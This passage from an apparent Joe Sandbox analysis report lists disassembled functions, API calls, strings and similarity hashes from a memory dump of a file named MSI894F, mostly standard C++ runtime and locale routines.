Instruction Fuzzy Hash: 16718EB0D01348EBEF11CFA8C94479EBBB4AF15314F184169E854BB391D7B99A08CBB1

Function 00D4F3B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000008,7EBC463A,?,00000000,00000000,?,?,?,00000000,00D8B1DD,000000FF,?,00D4ED0A,00000000,?), ref: 00D4F3F4
std::_Lockit::_Lockit.LIBCPMT ref: 00D4F42A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D4F48E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D4F4FE
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4F5B2

Strings

bad locale name, xrefs: 00D4F5CE

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2968629171-1405518554
Opcode ID: 796a0f56e5145dd20a94010b8e769bb0f4f2751cbdd4767fdbabf8dcf886c1a2
Instruction ID: af417c9e195da668af7668967668b5a9c7e2d4440a2d7fab527d6c5a4cea006d
Opcode Fuzzy Hash: 796a0f56e5145dd20a94010b8e769bb0f4f2751cbdd4767fdbabf8dcf886c1a2
Instruction Fuzzy Hash: C7619DB0D01388EFEF10CFA8D94479EBBB4AF15314F184169E854AB381D7799A08CB71

Function 00D68D30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00D68D67
___except_validate_context_record.LIBVCRUNTIME ref: 00D68D6F
_ValidateLocalCookies.LIBCMT ref: 00D68DF8
__IsNonwritableInCurrentImage.LIBCMT ref: 00D68E23
_ValidateLocalCookies.LIBCMT ref: 00D68E78

Strings

csm, xrefs: 00D68E0D

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: ed614d4f3f2804094977c80d27db74503cb4c2bffc597a2b099370c884f8d46a
Instruction ID: 8a041fdcf59bf0411afc8e5eb98b328f8b08905a6fe0fb9c47ea9a0510da2380
Opcode Fuzzy Hash: ed614d4f3f2804094977c80d27db74503cb4c2bffc597a2b099370c884f8d46a
Instruction Fuzzy Hash: 61418234A002189FCF10DF68C844A9EBBB6EF45324F188655F9149B392DB32EA55DFB1

Function 00D7C96B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00D7CA78,?,?,?,00000000,?,?,00D7CCA2,00000021,FlsSetValue,00D91E00,00D91E08,?), ref: 00D7CA2C

Strings

api-ms-, xrefs: 00D7C9C2
ext-ms-, xrefs: 00D7C9D6

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 8a572026d37fde364aeabe2188ac5a54f59c77b19c9916ceb7609b18d1590134
Instruction ID: 5eb6078a3a4a3afef0b173344bc84615ff53d3112ed95f123b6e53092862a205
Opcode Fuzzy Hash: 8a572026d37fde364aeabe2188ac5a54f59c77b19c9916ceb7609b18d1590134
Instruction Fuzzy Hash: 6421EB32A11315AFCB21DB65AC44A5A3769DF427B1F299215E949E73D0F730ED00CAF0

Function 00D42BD0 Relevance: 9.2, APIs: 6, Instructions: 225encryptionCOMMON

Download Yara Rule

APIs

#224.MSI(?,00000001,00000000,00000000,00000000), ref: 00D42C43
LocalFree.KERNEL32(?), ref: 00D42CA2
LocalFree.KERNEL32(?), ref: 00D42D0C
CertFreeCertificateContext.CRYPT32(00000000), ref: 00D42E94

Part of subcall function 00D43D60: CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00D43DA3

LocalFree.KERNEL32(?), ref: 00D42E13
LocalFree.KERNEL32(?), ref: 00D42E6B

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Free$Local$Cert$#224CertificateContextNameString
String ID:
API String ID: 2665452496-0
Opcode ID: 338a3f32a0bcabf1a55454f1bda434122ece97e0dd7d3a54aca59d2ce847bf44
Instruction ID: cd9ebf859647163d1e82eed45aaae1124c932562c769ea89092d3772632986f5
Opcode Fuzzy Hash: 338a3f32a0bcabf1a55454f1bda434122ece97e0dd7d3a54aca59d2ce847bf44
Instruction Fuzzy Hash: 50916D709103498FDB18CFA8C958BAEFBB2FF44304F54461DE455AB391DBB5AA84CB60

Function 00D4B500 Relevance: 9.2, APIs: 6, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00D4B52D
std::_Lockit::_Lockit.LIBCPMT ref: 00D4B550
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4B578
std::_Facet_Register.LIBCPMT ref: 00D4B5ED
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4B617
LocalFree.KERNEL32 ref: 00D4B6C0

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_FreeLocalRegister
String ID:
API String ID: 1378673503-0
Opcode ID: 959d0676ff46aa8efabbeeb46e97c17c4109f3d70cc0a05c26f5d3a477eaa0bc
Instruction ID: b4ed7fb84e95c2690b82d5e78de20a19311ddb5f84ca7149796821eaabe8e55c
Opcode Fuzzy Hash: 959d0676ff46aa8efabbeeb46e97c17c4109f3d70cc0a05c26f5d3a477eaa0bc
Instruction Fuzzy Hash: 5F51AD71800759EFCB21DF58E845BAABBB4FB15320F14466AE851A7390D7B0AA04CBB1

Function 00D75981 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00D75A6B
__freea.LIBCMT ref: 00D75B01
__freea.LIBCMT ref: 00D75B1D

Strings

a/p, xrefs: 00D75BE5
am/pm, xrefs: 00D75B81

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: __freea$__alloca_probe_16
String ID: a/p$am/pm
API String ID: 3509577899-3206640213
Opcode ID: c354398617ec821ea6ef3d022e62e44fe042c70f80c373035d6b79f135186ebf
Instruction ID: 6ae9344bfaa9ca08b02f21ce66b49efd10ee188724b9048de79f63fc81d1f6b2
Opcode Fuzzy Hash: c354398617ec821ea6ef3d022e62e44fe042c70f80c373035d6b79f135186ebf
Instruction Fuzzy Hash: BFC1C131900A56DBDB258F68E489BBA77B0FF06300F28C159E549AB258F3B1DD41CB72

Function 00D6AEF5 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00D6AEEC,00D69710,00D685A3), ref: 00D6AF03
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D6AF11
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D6AF2A
SetLastError.KERNEL32(00000000,00D6AEEC,00D69710,00D685A3), ref: 00D6AF7C

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9a8658a9ff7a68b55a9d8e98313fe824f0df95debc0997dd146dfd0e52cef109
Instruction ID: bd3bd8f81f53925ee4cb5e8ec3b1a66c4b60d115158ba3eceb3db22613aa70d2
Opcode Fuzzy Hash: 9a8658a9ff7a68b55a9d8e98313fe824f0df95debc0997dd146dfd0e52cef109
Instruction Fuzzy Hash: 1601F77221D7116FA7242B79BC85A26B756EF03B747200229F190B21E1FF55CE0066BA

Function 00D5D38D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D5D394
_Getvals.LIBCPMT ref: 00D5D3E6
_Mpunct.LIBCPMT ref: 00D5D421
_Mpunct.LIBCPMT ref: 00D5D43B

Strings

$+xv, xrefs: 00D5D446

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Mpunct$GetvalsH_prolog3
String ID: $+xv
API String ID: 2204710431-1686923651
Opcode ID: d13e8ea6c9f018902f6128f74b30126c3fef9a3b1ea5bb930629d804db9fb3c9
Instruction ID: 2e888817fa3d0bafa102b0d5029c0c4a6d9f2cc3e330e688dbc841733d47d1f7
Opcode Fuzzy Hash: d13e8ea6c9f018902f6128f74b30126c3fef9a3b1ea5bb930629d804db9fb3c9
Instruction Fuzzy Hash: 072181B1904B92AFDB25DF75C45073BBEE8EB09302F04461AE899C7A41E734E605CBB0

Function 00D483E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(7EBC463A,7EBC463A,?,?,00000000,00D8A221,000000FF), ref: 00D4847B

Part of subcall function 00D67875: EnterCriticalSection.KERNEL32(00DA4AF8,00000000,?,?,00D425B6,00DA571C,7EBC463A,?,00000000,00D893ED,000000FF,?,00D41A26), ref: 00D67880
Part of subcall function 00D67875: LeaveCriticalSection.KERNEL32(00DA4AF8,?,?,00D425B6,00DA571C,7EBC463A,?,00000000,00D893ED,000000FF,?,00D41A26,?,?,?,7EBC463A), ref: 00D678BD

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00D48440
GetProcAddress.KERNEL32(00000000), ref: 00D48447

Part of subcall function 00D6782B: EnterCriticalSection.KERNEL32(00DA4AF8,?,?,00D42627,00DA571C,00D8CCC0), ref: 00D67835
Part of subcall function 00D6782B: LeaveCriticalSection.KERNEL32(00DA4AF8,?,?,00D42627,00DA571C,00D8CCC0), ref: 00D67868
Part of subcall function 00D6782B: RtlWakeAllConditionVariable.NTDLL ref: 00D678DF

Strings

kernel32, xrefs: 00D4843B
IsWow64Process, xrefs: 00D48436

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
String ID: IsWow64Process$kernel32
API String ID: 2056477612-3789238822
Opcode ID: 63fde83b6370c8f9a03ca52899fc6d6690667d0137193e1f92c17b48f5d55075
Instruction ID: b1e2cea5a922eac3708d928f259530ea02a6757188d786eca0b5ba25d56e4a14
Opcode Fuzzy Hash: 63fde83b6370c8f9a03ca52899fc6d6690667d0137193e1f92c17b48f5d55075
Instruction Fuzzy Hash: 85114D72944B05EFCB10DFA4ED05B5DB7A8E709B20F14466AE815E3390EB7569048B71

Function 00D78461 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,7EBC463A,?,?,00000000,00D8CBE4,000000FF,?,00D783F1,?,?,00D783C5,?), ref: 00D78496
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D784A8
FreeLibrary.KERNEL32(00000000,?,00000000,00D8CBE4,000000FF,?,00D783F1,?,?,00D783C5,?), ref: 00D784CA

Strings

CorExitProcess, xrefs: 00D784A0
mscoree.dll, xrefs: 00D7848F

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 8cd63fb3856e63eb07404301f020df3b9b1d86e991de75db457adc64d87978df
Instruction ID: 8c5f3daaa9a73fcf96c76050b9ae3231b8606acf94a64c7cccdb519211b1cd3c
Opcode Fuzzy Hash: 8cd63fb3856e63eb07404301f020df3b9b1d86e991de75db457adc64d87978df
Instruction Fuzzy Hash: 1401A235954726AFCB019F90DC09FAEBBBAFB04B14F044526F911E22D0DBB49900CBB0

Function 00D5DDD2 Relevance: 7.9, APIs: 5, Instructions: 433COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D5DDD9
collate.LIBCPMT ref: 00D5DF54
numpunct.LIBCPMT ref: 00D5E1CE

Part of subcall function 00D583C2: __EH_prolog3.LIBCMT ref: 00D583C9

Part of subcall function 00D5815A: __EH_prolog3.LIBCMT ref: 00D58161
Part of subcall function 00D5815A: std::_Lockit::_Lockit.LIBCPMT ref: 00D5816B
Part of subcall function 00D5815A: std::_Lockit::~_Lockit.LIBCPMT ref: 00D581DC

Part of subcall function 00D4EAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4EB1D
Part of subcall function 00D4EAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4EB40
Part of subcall function 00D4EAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4EB68
Part of subcall function 00D4EAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4EC07

Part of subcall function 00D54403: Concurrency::cancel_current_task.LIBCPMT ref: 00D544C6

Part of subcall function 00D5764B: __EH_prolog3.LIBCMT ref: 00D57652
Part of subcall function 00D5764B: std::_Lockit::_Lockit.LIBCPMT ref: 00D5765C
Part of subcall function 00D5764B: std::_Lockit::~_Lockit.LIBCPMT ref: 00D576CD

__Getcoll.LIBCPMT ref: 00D5DF94

Part of subcall function 00D4BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4BD10
Part of subcall function 00D4BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D4BD38

Part of subcall function 00D484C0: LocalAlloc.KERNELBASE(00000040,00000000,00D6839D,00000000,7EBC463A,?,00000000,?,00000000,?,00D8CB8D,000000FF,?,00D417D5,00000000,00D8D3BA), ref: 00D484C6

Part of subcall function 00D4B9E0: __Getctype.LIBCPMT ref: 00D4B9EB

Part of subcall function 00D57A5E: __EH_prolog3.LIBCMT ref: 00D57A65
Part of subcall function 00D57A5E: std::_Lockit::_Lockit.LIBCPMT ref: 00D57A6F
Part of subcall function 00D57A5E: std::_Lockit::~_Lockit.LIBCPMT ref: 00D57AE0

Part of subcall function 00D57B88: __EH_prolog3.LIBCMT ref: 00D57B8F
Part of subcall function 00D57B88: std::_Lockit::_Lockit.LIBCPMT ref: 00D57B99
Part of subcall function 00D57B88: std::_Lockit::~_Lockit.LIBCPMT ref: 00D57C0A

Part of subcall function 00D57DDC: __EH_prolog3.LIBCMT ref: 00D57DE3
Part of subcall function 00D57DDC: std::_Lockit::_Lockit.LIBCPMT ref: 00D57DED
Part of subcall function 00D57DDC: std::_Lockit::~_Lockit.LIBCPMT ref: 00D57E5E

Part of subcall function 00D57D47: __EH_prolog3.LIBCMT ref: 00D57D4E
Part of subcall function 00D57D47: std::_Lockit::_Lockit.LIBCPMT ref: 00D57D58
Part of subcall function 00D57D47: std::_Lockit::~_Lockit.LIBCPMT ref: 00D57DC9

Part of subcall function 00D54403: __EH_prolog3.LIBCMT ref: 00D5440A
Part of subcall function 00D54403: std::_Lockit::_Lockit.LIBCPMT ref: 00D54414
Part of subcall function 00D54403: std::_Lockit::~_Lockit.LIBCPMT ref: 00D544BB

codecvt.LIBCPMT ref: 00D5E27F

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatenumpunct
String ID:
API String ID: 2252558201-0
Opcode ID: f398809819231d553d4b81fa5ecc721549dcdaf8c1947391eb905c49212ed584
Instruction ID: 3ef5c08c7ed10c5f0b15ca50035c731612f3d705d6a0d9c5df7bcbda546f7c5c
Opcode Fuzzy Hash: f398809819231d553d4b81fa5ecc721549dcdaf8c1947391eb905c49212ed584
Instruction Fuzzy Hash: B0E1F4B180021AABDF25BF648C4267F7BA5EF51362F15442EFC585B381EB708D189BB1

Function 00D7C382 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00D7C409
__alloca_probe_16.LIBCMT ref: 00D7C4CA
__freea.LIBCMT ref: 00D7C531

Part of subcall function 00D7B127: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D7AAAA,?,00000000,?,00D6C282,?,?,?,?,?,?,00D41668), ref: 00D7B159

__freea.LIBCMT ref: 00D7C546
__freea.LIBCMT ref: 00D7C556

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 94728651ee45f2bc49ffe4eb875b7e92b175070f21088e104413aed83947067f
Instruction ID: 123647d8cfd4f80040c3c78cce4b4f458d9cac90a62c2148a1b76d90ea8810ec
Opcode Fuzzy Hash: 94728651ee45f2bc49ffe4eb875b7e92b175070f21088e104413aed83947067f
Instruction Fuzzy Hash: 6B518E7262021AAFEF219F64DC81EBF76A9EF44358B19912DFD0CD6151FA21ED1087B0

Function 00D4C590 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00D4C5BD
std::_Lockit::_Lockit.LIBCPMT ref: 00D4C5E0
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4C608
std::_Facet_Register.LIBCPMT ref: 00D4C67D
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4C6A7

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: cf365b85be4c8d67ee30c63b2e851ae4f856f9e46c0ab1057f131e37e03eebf2
Instruction ID: 34152f6a0420c314e4fa051f45e7b20886aceb7ac215115711122c211e1019f6
Opcode Fuzzy Hash: cf365b85be4c8d67ee30c63b2e851ae4f856f9e46c0ab1057f131e37e03eebf2
Instruction Fuzzy Hash: E241E171811259DFCF11CF68E840BAEBBB4EF45710F298169E814A73A1D774AE04CBB1

Function 00D4EAF0 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00D4EB1D
std::_Lockit::_Lockit.LIBCPMT ref: 00D4EB40
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4EB68
std::_Facet_Register.LIBCPMT ref: 00D4EBDD
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4EC07

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 113eb78226529ca0024b1621a6065fd84ca676d228d89e0ca826f3e2805c2e28
Instruction ID: f4faf825b3547a3c400258b241833513732795beebae7667bcec0411177f4f70
Opcode Fuzzy Hash: 113eb78226529ca0024b1621a6065fd84ca676d228d89e0ca826f3e2805c2e28
Instruction Fuzzy Hash: 9C41B171800669EFCF11CF58D845BAEBBB4FB05724F184299E815A7391D730AE05CBB1

Function 00D4EC30 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00D4EC5D
std::_Lockit::_Lockit.LIBCPMT ref: 00D4EC80
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4ECA8
std::_Facet_Register.LIBCPMT ref: 00D4ED1D
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4ED47

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 514b15ed3c8e490da19516a5fff354b876e9cf8bc1d9565fff5c2f1c329d3222
Instruction ID: 2edc736f5aac0b8ce87086601bc1a7ad71b1362a160b428eede9a87e115af904
Opcode Fuzzy Hash: 514b15ed3c8e490da19516a5fff354b876e9cf8bc1d9565fff5c2f1c329d3222
Instruction Fuzzy Hash: 2241AB71800659EFCB11CF58E885BAEBBB4FB05724F18465AE811A7391D731AE08CBF1

Function 00D4ED70 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00D4ED9D
std::_Lockit::_Lockit.LIBCPMT ref: 00D4EDC0
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4EDE8
std::_Facet_Register.LIBCPMT ref: 00D4EE5D
std::_Lockit::~_Lockit.LIBCPMT ref: 00D4EE87

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
